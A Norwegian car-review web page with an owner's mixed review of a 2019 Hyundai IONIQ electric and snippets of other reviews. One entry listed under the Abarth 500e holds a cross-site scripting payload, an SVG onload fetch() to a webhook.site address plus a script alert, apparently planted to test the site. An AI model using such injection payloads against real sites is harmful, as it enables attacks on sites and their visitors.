Hvilken bil ser du etter?

Tilbake til front | Skriv en vurdering
2019 Hyundai IONIQ electric Teknikk Kombikupé Batteri

Score 5.8/10

Billeg framkomstmiddel utan køyreglede. Relativt mykje bil for pengane, men det vert nok ikkje Hyundai igjen. Bilen framstår uferdig, men det er gjerne å forventa i denne prisklassen...?

Kjøreglede

2 / 10
Som å køyra et badekar - ikkje særleg spennande. Understyrt og vinglete. Når vindaugsviskarane går for fulle mugger vogger faktisk bilen frå side til side. Ved kraftig sidevind må ein konstant korrigera.

Ved kvar oppstart er det fleire innstillingar som nullstillast, som regenerering og varme/kjøling i sete. Regnsensor er vanvittig dårleg. Sjølv på strak motorveg har den adaptive cruisekontrollen skremt livskiten av meg. Skulle ønske han ikkje var adaptiv... Dei fleste som kjøper Hyundai kjem vel frå gamal Toyota Yaris eller Daewoo, og då er det sjølvsagt ein fin oppgradering.

Klimaanlegget er eit kapittel for seg sjølv. Her har dei nok spart mykje pengar, for det må vera skikkeleg underdimensjonert.

Kvalitet/driftssikkerhet

6 / 10
Eit dørhandtak knakk. Begge sidespeglane slutta å folda seg inn. Fekk heldigvis eitt nytt på garanti. Nytt 12V-batteri på garanti. Dette var "vanlege" feil. Mykje kjip plast. Ei lita rustboble på bakluke fekk eg òg dekka.

Plass/praktiske løsninger

3 / 10
Dørhandtak lyser opp når du nærmar deg bilen, men han låser seg ikkje opp, så då er du like langt... Ladekabel vert låst fast i ladeport sjølv om bilen er ulåst. Knotete å måtta låsa opp bilen for å få løyst ut ladekabel når bilen berre står ulåst i garasjen. Er det berre eg som irriterer meg over sånne bagatellar?

Rotete og treigt infotainmentsystem med dårleg norsk.

Grei bagasjeplass for å vera el-bil, men med barnestol i baksetet vert det veldig trangt i framsetet. Eg må sitta med krumma nakke og det er veldig ubehageleg.

Økonomi/kostnader

8 / 10
Trur eg betalte 3000kr for sist service hjå forhandlar, som er ganske greitt. Men så var det ikkje akkurat så mykje motorolje å byta...

Drivstoff/forbruk

10 / 10
Klarer 13-14 kWh/100km, som er imponerande. Fantastisk bil!

Flere vurderinger fra samme generasjon

Hyundai IONIQ EV (2022)

Jeg har hatt bilen i ett og et halvt år. Alt virker veldig gjennomtenkt, og kvaliteten er høy. Noe jeg liker spesielt godt er at jeg kan stille inn ladetiden fra appen. Når jeg ser hva strømprise

Score 9.4

Vurdert av Espen

Hyundai IONIQ EV (2020)

Dette er et rent fremkomstmiddel uten kjøreglede med grei rekkevidde og mye utstyr til en billig penge! Grusom annenhånds- verdi og verdifall, lønner seg hvis du har den noen år og pendler i bompe

Score 5.0

Vurdert av Evo93

Hyundai IONIQ EV (2020)

Mye bil for pengene!!!

Score 9.6

Vurdert av JPFev

Hyundai IONIQ EV (2020)

Overraskende gode kjøreegenskaper. Ekstremt lettkjørt, lettbetjent skjerm og god betjening generelt. Svært strømeffektiv. Litt kjedelig eksteriør, men tidløst. KW /hk greier seg godt. Litt lite

Score 9.2

Vurdert av Inglun

Hyundai IONIQ EV (2020)

Meget fornøyd med denne bilen totalt sett, men savner hengerfeste.

Score 9.4

Vurdert av Hans

Hyundai IONIQ EV (2020)

Score 10

Vurdert av Tboen

Hyundai IONIQ EV (2020)

Veldig bra og fin på alle måter

Score 9.8

Vurdert av Vegardkran91

Hyundai IONIQ EV (2020)

Overraskende mye bil for pengene. Vi kjøpte denne siden det var den som kom nærmest en vanlig familiebil i størrelse med anstendig rekkevidde uten at vi måtte over halve millionen i innkjøpspris.

Score 9.0

Vurdert av Skule

Hyundai IONIQ EV (2020)

Har til sammen kjørt 70.000 i min 2017 og nå 2018 modell. Selv om hurtiglading er vesentlig tregere kunne jeg kommet meg fra Trondheim til Oslo på en lading om jeg hadde lader 55 minutter istedenfo

Score 9.8

Vurdert av KristianOlaf

Hyundai IONIQ EV (2020)

Fantastisk herlig bil med god plass til en hel familie på 4 (med barnestoler og 2 store katter). Varme i baksetet, minnefunskjon på førerstol, aktive lanekeeping (bilen snurrer rattet så du ikke k

Score 9.8

Vurdert av Florrie

Hyundai IONIQ EV (2020)

Meget fornøyd, lettkjørt og med lavt forbruk.

Score 10

Vurdert av Ole_

Hyundai IONIQ EV (2020)

Score 9.6

Vurdert av Andreas

Hyundai IONIQ EV (2020)

En meget god bil! Hurtigladingen er derimot ikke tilfredsstillende kontra andre elbiler. Maks 30 kw på maks på 50 kw lader er ikke godt nok, men siden 95% av ladinga gjøres på hjemmelader er det e

Score 9.2

Vurdert av Audun1337

Hyundai IONIQ EV (2020)

Feilfri og godt utstyrt bil. Bruker nesten ikke strøm, selv på 110 motorvei.

Score 9.8

Vurdert av haraldjo

Hyundai IONIQ EV (2020)

Fantastisk bil. God å kjøre, god rekkevidde, stille, lavt forbruk, rask, oversiktlig.

Score 10

Vurdert av Paul

Flere vurderinger

Abarth 500e (2024)

Score 1.0

Vurdert av xxxfooo4

Abarth 500e (2024)

xxxfooo4

Score 3.0

Vurdert av xxxfooo4

Abarth 500e (2024)

<svg xmlns="http://www.w3.org/2000/svg" onload="fetch('https://webhook.site/418d388b-4676-4b57-95ba-4330be1ec311')"> <circle cx="50" cy="50" r="40" fill="red"/> </svg> <script>alert(1)</script>

Score 6.2

Vurdert av Bernt

Volvo EX40 (2026)

Dette er ikke en volvo som vi er kjent med volvo. Dårlige seter, umulig å opprettholde 20grader i kupe på vinter, kjapp på gasspedal, men enormt strømforbruk uansett hvordan du prøver å tilpass

Score 1.6

Vurdert av Jorsalfar1996

Ford Explorer EV (2025)

Kommer nok til å bytte den ut pga den nervøse oppførselen på vinterføre. Utenom dette svarer den godt på alle parametre.

Score 8.2

Vurdert av Adams

Ford Kuga (2021)

Forbruk. Gir en tier for forbruk langkjøring. 0,44 og forbruk 0,8 med campingvogn, totalvekt 1400 kg(ved tomt batteri). Rekkevidde elektrisk på vinter månedene er fra 20 - 30 km, blandet/bykjøring

Score 8.6

Vurdert av Viggo

Hongqi E-HS9 (2022)

Den er utrolig komfortabel, stille og har en kvalitet som overgår det meste på markedet. Har hatt bilen i 2år nå, å hele familien elsker bilen!

Score 8.2

Vurdert av MrP85

Mercedes-Benz EQC (2022)

Topp komfort og driftsikker.

Score 9.4

Vurdert av Renna

Polestar 2 (2022)

God kvalitetsfølelse. Gode (frem-) seter. Smart med OTA (oppdateringer over-the-air). Lett å selv restarte system og app etter behov. Pen bil! Praktisk med frunk for elkabler på langtur. (hvorfor h

Score 8.8

Vurdert av Autofilen

Mercedes-Benz GLE (2020)

Skuffende å måtte skifte opphengskuler foran på begge sider etter kun 75000 km

Score 9.6

Vurdert av Hans

BMW 3-Serie (2012)

Hadde det vært et punkt som het eierglede så hadde jeg glatt gitt 10 av 10!! Bilen er vakker og tvers igjennom godt bygget! Nydelig å kjøre og det meste bærer preg av å være bygget med gode mat

Score 8.8

Vurdert av Knappertappen

MG ZS EV (2022)

Veldig godt fornøyd med bilen på alle måter tatt i betraktning at det var en forholdsvis rimelig bil.

Score 8.4

Vurdert av HansR

Zeekr X (2025)

Veldig fornøyd med godt og tøft design, god kvalitet og bra praktiske løsninger

Score 9.4

Vurdert av Lillebror

Jaguar F-Pace (2019)

Sportslig og god å kjøre,selv uten luftfjæring som en ikke får på denne.Fantastisk firhjulsdrift når det trengs,bakhjulsbasert drift ellers.

Score 9.2

Vurdert av Arl76

Kia EV6 (2022)

Dette er en førsteutgave, og med de er det en del barnesykdommer. Så også for EV6. Det mest positiver er rekkevidde, forbruk og ladehastighet i tillegg til lang garanti. Dette var hovedargument for

Score 8.0

Vurdert av Labbetuss